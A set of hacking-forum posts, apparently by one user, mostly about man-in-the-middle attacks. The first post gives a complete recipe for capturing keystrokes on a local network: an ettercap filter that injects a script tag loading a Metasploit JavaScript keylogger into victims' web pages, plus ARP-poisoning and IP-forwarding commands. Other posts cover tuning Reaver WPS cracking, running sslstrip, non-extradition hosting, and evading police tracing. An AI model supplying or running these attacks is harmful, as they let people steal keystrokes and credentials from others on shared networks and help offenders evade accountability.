Diggs

I've spent a bit of time working on the Middler issues for a while and haven't gotten to the bottom of them. The python parsing is both slow and mildly buggy and the results just haven't shown up for a standalone application which can accomplish what I was hoping for. In the meantime, I found that the Metasploit http_javascript_keylogger has been added back to the stable branch. Combined with some good ettercap filters, you can append either the Java modules or the keylogger script and it's much, much faster. First, we need to generate the Javascript Keylogger and set up a handler in Metasploit for it. This is under use auxiliary/server/capture/http_javascript_keylogger For some more details on using the module, look here: https://community.rapid7.com/community/metasploit/blog/2012/02/21/metasploit-javascript-keylogger Setting this up properly will set up the javascript in a random folder under /var/www and create a handler for the returned characters. The next step is to insert it into the stream. The ettercap filter I have been playing with looks like this: if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Nothing!"); } } if (ip.proto == TCP && tcp.src == 80) { if (search(DATA.data, "</head>")) { replace("</head>", "</head><script src=\"http://192.168.0.2/qZBRDzd/test.js\"></script> "); } if (search(DATA.data, "</HEAD>")) { replace("</head>", "</head><script src=\"http://192.168.0.2/qZBRDzd/test.js\"></script> "); } } The qZBRDzd/test.js is the file which is created from the Metasploit module. This can be compiled with etterfilter: etterfilter jsEmbed.filter -o jsEmbed.ef So, we've got a filter that will insert the javascript src right after the head of a document. We now need to run ettercap and MITM the network. You will need to set up ip_forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward And make sure ettercap is set up in etter.conf to handle iptables. Look that part up if you are new to it. Now run ettercap: ettercap -T -q -F jsEmbed.ef -M ARP // // With this setup, I've found what I originally wanted in the Middler and also used a couple of well known and stable products instead of a one-off demo for a con. If there are any fun ideas or improvements, let me know.

I'm looking at setting up a laptop so I can connect to one of the wireless cards attached to it and ssh into the laptop directly from the wireless connection. Is there a specific term I should be searching for setting up a direct wireless connection without bridging to allow an ssh connection? Thanks

Can anyone confirm sauce on this? I'm always a bit reluctant to install a package that doesn't provide any sourcefiles on Sourceforge. Other than that, this seems like an interesting project and something I was looking around to get for a while.

I have used Reaver. The reason I was asking was so that I could fine tune the reaver settings. The MAC address gives the Manufacturer, but not the model. I started looking through an airodump of the Reaver working and found that I could actually find the Make, Model and firmware version of the router in the pcap file. I was using vi, but I bet if you fired up Wireshark, you could find a lot more info. With this, I can start looking up WPS pin prefixes and the Reaver settings. I would highly recommend this as a step to fine tuning the Reaver attack.

I have a couple questions about the following demo: http://partners.immunityinc.com/movies/SILICA-WPS.mov So basically, Silica has a tab to get more information from the WAP which they are interested in. This includes the make, model and series of WPS pins that have been seen. This allows a user to fine tune the attack. I am interested in if anyone knows how they get the exact make and model off of an unconnected Wireless router and if anyone else has WPS pin-lists to help narrow down the range of pins. I have looked into MAC address lookups, but they identify the make and don't provide much information on the model. Is there any way of analyzing either packets or banners off of an unconnected router to identify it? If anyone here works for Immunity, big ups on Canvas, the Debugger and Silica. If you have a $3400 off coupon, toss it my way. Has anyone else started a WPS Pin list? I could see this being incredibly useful for pattern matching.

You probably need to set the permissions for that file to execute. There are two ways to fix this. First Method ============= run 'python ./sslstrip.py -l 8080' python will read the script and run it. Second Method ============= First, find out what the permissions currently are with 'ls -ltr sslstrip.py' in the directory you have sslstrip.py in. You should have rwxrw-rw- for that to run natively. Try 'sudo chmod 755 sslstrip.py' Then run './sslstrip.py -l 8080' Basically, this is happening because the file is readable, but not executable. You should set it to exacutable to run without the 'python' command prepended. Otherwise, python will be executed and it will just read the sslstrip.py script. Let me know if that makes sense.

I would make sure that ettercap is up to the current version. The L3 errors show up with the older version when there is a conflict with a newer Linux kernel.

You should also check out int0x80's talk on Anti-Forensics. He sets up some scripts to automatically delete the usb drives when they show up. There might be something in his checksum that would prevent the driver from firing if it's not in the whitelist.

This is kind of a known issue with sslstrip. It shows up when an ssl connection has been closed at an unexpected time. It pops up pretty regularly, but can be ignored. I would suggest to upgrading it to 0.9 which is the most recent version: http://www.thoughtcrime.org/software/sslstrip/ I would also make sure that ettercap is upgraded if you are using it. Otherwise it acts really funny with newer versions of the Linux kernel.

Ach, now it's been moved to the unstable branch.

For fun, you can also read up on the new Hash collisions. If you can understand that, then you'll probably be able to get DDOS's in general. Plus, it'll get you a bit more into code development. There has also been some DNS based DoS work you could look at. You might also want to specify what you are looking to do. I imagine that you might be trying to get into something and not coming at it in the best direction. I would advise a lot of caution though. Plenty of people who thought they were good are in jails right now for not being smart enough about what illegal things seemed like fun.

I've been working on a couple irritating things with the Middler code and then ran across this: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/auxiliary/server/capture/javascript_keylogger.rb Metasploit MitM keylogger. I'll see if I can get the Middler code working still, but this seems like it pretty much covers what I was hoping to do.

You might also want to try a Python script. I know I've used them to communicate over serial before and it has Serial libraries which aren't too tough.

If you are really careful, you could pick a country which doesn't share extradition treaties with the US. They will probably be hostile, so getting data from that server will also be more difficult. If you are super paranoid, there are some advantages to being off-shore. They are offset by dealing with foreign bodies and all the headache that can entail. You could also set up an Amazon EC2 micro-instance which has decent bandwidth and is free-ish. Depending on how much you are using it, you could use it as an ssh pivot and I bet it would get you by.

I know Whisper Systems does full disk encryption on a smartphone. You could set up that with the encrypted SMS and Skype to get things pretty well secured. I think I've just found the tipping point of paranoia Vs. cheapness. Buy a burn phone every week to avoid getting monitored by the Feds? Meh, I'll just let Agent Stanley listen to me talk to all my buddies.

You could also just wait around a corner and pop 'em in the knee with a bat. You gotta understand that being a dick is being a dick. And probably about as legal. Be willing to commit if you're going to commit crimes.

Hey Int0x80, you have any suggestions on privatizing cell phone use? I know that Moxie Marlinspike has done work with encrypting text messages, but do you have any suggestions on point to point encryption on calls? Data I'm comfortable with, but communications is something I am pretty inexperienced with.

There isn't like a trace time like they show in movies. Basically, Blue Team checks logs and looks for IP addresses they want. Then they go to that IP address. If you pivoted off of something, Blue team requests logs from that server. If you aren't behind a proxy, it's more like they get your address and wait around while a warrant comes through. Tracing who has connected to a server isn't a slow process. It either happens really, really fast and they know which computer they want or it happens really really slow because there is a bunch of paperwork getting filed. So there are ways to hide where you are coming from, but when the FBI starts looking for you, they'll just find you. No tracing involved. If you are worried about having a real-time stalker, that's different. Keep your head down, pay with cash, get out of the region they are looking in. I would say grow a beard, but I'm guessing you are a bit young still. Either way, there isn't really a way to measure the progress of researching you when someone is looking for you, and that is kind of what you are asking for.

Man. I have done terrible, terrible things for pitchers of margaritas. If I would have just known setting security for a router would have gotten me that, I would need a lot less shots every time I go to the doctor's.

int0x80's right, if you're getting tracked, your wife/girlfriend/bully is doing it from something on your cellphone. If it's the FBI, you prolly shouldn't 'a done what you done. I'm interested in why you think someone is tracking you too. That might provide insight into how to prevent it.

You could also just nuke your phone and computer. Format and re-install. Keep important data on detached storage and slowly migrate it back. The last thing you migrate before you start seeing shadows is probably the infected source. Then I would burn off your fingerprints and drink some ammonia so they can't get your DNA an-SHIT ***THUD***

There are a couple other ways this can be done besides malware. They can get a rough estimate of your location based on an IP sometimes. They might even be able to calculate your location from the cellphone towers, but if they are doing that then you're dealing with someone pretty well equipped or with tricks I would love to know about. If they are doing a rough estimate by your IP, you could use a Tor proxy. They have those for Android and you could set one up in your house too. I would guess you've got something running as a daemon or a service, so I would think you'll have to analyze the packets leaving the cell phone by connecting to a wired network and putting running Wireshark and watch the lines and see what is being output. It'll probably be a bit of digging, but you'll be able to find out what IP it's aiming at, what it's passing back and maybe what applications are using it. From there, you can block the port so it can't talk anymore. You could also go low-tech and just go somewhere that will be both suspicious, out in the open and unfamiliar to the watcher. Then just wait for the person to arrive and watch from a distance. Whatever equipment they are looking at when they are driving up is the problem. Just get a hold of that and see what they have running.

I know I have been blocked on AP Isolation/Client Isolation/Layer-2 WAPs when trying to mitm or DNS spoof. The ARP replies go dead in arpspoof and ettercap. I wondered for a while what was blocking my signals to my cell phone. I spoofed my MAC and it DOS'd the coffeeshop for a bit, so this sounds exactly like what I was running into. Any recommendations on fun that can be had on a Client Isolated network interacting with the other clients? And I'm staying out of the router unless that is the last option. I don't have AP Isolation on my home router, so I don't really have a test bed and pivoting off somebody else's router seems like a good way to be a tattooed gorilla's unwilling girlfriend for a couple months.

i8igmac, that looks like fun. I'll see if I can play with it over this weekend. I haven't made much progress on the Middler plugin since last post. Been caught up in other stuff, but I'm hoping that either tonight or tomorrow night I'll have something to post. Right now, I've got the plugin injecting javascript and then creating a SimpleHttpServer to catch responses, but I need to thread the server because right now it's blocking the remaining process after spawning. After I get this set up, I'll see if the global onClick and onKeyPress events are working and if they keep a couple major websites from breaking. The final step is to see if the Middler sslstrip process works with all this nonsense. After that, some exception handling and logging. That will pretty much round up what I was hoping to do with the Javascript keylogger plugin for an alpha release.

Also, I'm not Kim Jung Un. But that is the most serious golf clap I've ever seen a picture of.